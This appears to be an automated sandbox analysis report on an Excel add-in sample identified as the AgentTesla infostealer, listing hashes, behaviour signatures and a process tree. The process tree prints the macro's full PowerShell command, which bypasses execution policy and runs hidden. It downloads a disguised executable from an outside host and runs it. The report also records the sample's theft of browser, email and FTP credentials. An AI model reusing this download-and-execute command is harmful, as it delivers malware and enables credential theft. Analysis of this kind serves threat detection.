Analysis
-
max time kernel
147s -
max time network
25s -
platform
windows7_x64 -
resource
win7v200430 -
submitted
09-07-2020 04:22
Static task
static1
Behavioral task
behavioral1
Sample
16015107.xlam
Resource
win7v200430
Behavioral task
behavioral2
Sample
16015107.xlam
Resource
win10
General
-
Target
16015107.xlam
-
Size
12KB
-
MD5
db3b7d4cfb134c5ad4c74891e23c06e4
-
SHA1
b78856ac0597b12d2befe6ebb055082632529a71
-
SHA256
2e6f88c4dc2322c385d506a81b5127f4361cb824389315d4dbb100e959c8fbc0
-
SHA512
2266ab432712b2a9d4a744bcf0ac852e5573a00fe114c5378bd1e8a87355a6038efc32c38738ea7edb64eb8236458dbfdbc4cadfa84ccef196c20a8f0b153a00
Malware Config
Extracted
http://shopcart.indbytes.com/cig/16015107.jpg
Signatures
-
Blacklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 4 324 powershell.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exefdhe.exedescription pid process Token: SeDebugPrivilege 324 powershell.exe Token: SeDebugPrivilege 1228 fdhe.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
EXCEL.EXEpid process 904 EXCEL.EXE -
Suspicious use of SetWindowsHookEx 5 IoCs
Processes:
EXCEL.EXEpid process 904 EXCEL.EXE 904 EXCEL.EXE 904 EXCEL.EXE 904 EXCEL.EXE 904 EXCEL.EXE -
Executes dropped EXE 1 IoCs
Processes:
fdhe.exepid process 1228 fdhe.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
powershell.exefdhe.exepid process 324 powershell.exe 324 powershell.exe 1228 fdhe.exe 1228 fdhe.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Office loads VBA resources, possible macro or embedded object present
-
Suspicious use of FindShellTrayWindow 2 IoCs
Processes:
EXCEL.EXEpid process 904 EXCEL.EXE 904 EXCEL.EXE -
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
cmd.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process 240 904 cmd.exe EXCEL.EXE -
Suspicious use of WriteProcessMemory 10 IoCs
Processes:
EXCEL.EXEcmd.exepowershell.exedescription pid process target process PID 904 wrote to memory of 240 904 EXCEL.EXE cmd.exe PID 904 wrote to memory of 240 904 EXCEL.EXE cmd.exe PID 904 wrote to memory of 240 904 EXCEL.EXE cmd.exe PID 240 wrote to memory of 324 240 cmd.exe powershell.exe PID 240 wrote to memory of 324 240 cmd.exe powershell.exe PID 240 wrote to memory of 324 240 cmd.exe powershell.exe PID 324 wrote to memory of 1228 324 powershell.exe fdhe.exe PID 324 wrote to memory of 1228 324 powershell.exe fdhe.exe PID 324 wrote to memory of 1228 324 powershell.exe fdhe.exe PID 324 wrote to memory of 1228 324 powershell.exe fdhe.exe
Processes
-
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\16015107.xlam1⤵
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:904 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powershell.exe -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('http://shopcart.indbytes.com/cig/16015107.jpg',$env:Temp+'\fdhe.exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\fdhe.exe')2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:240 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('http://shopcart.indbytes.com/cig/16015107.jpg',$env:Temp+'\fdhe.exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\fdhe.exe')3⤵
- Blacklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:324 -
C:\Users\Admin\AppData\Local\Temp\fdhe.exe"C:\Users\Admin\AppData\Local\Temp\fdhe.exe"4⤵
- Suspicious use of AdjustPrivilegeToken
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1228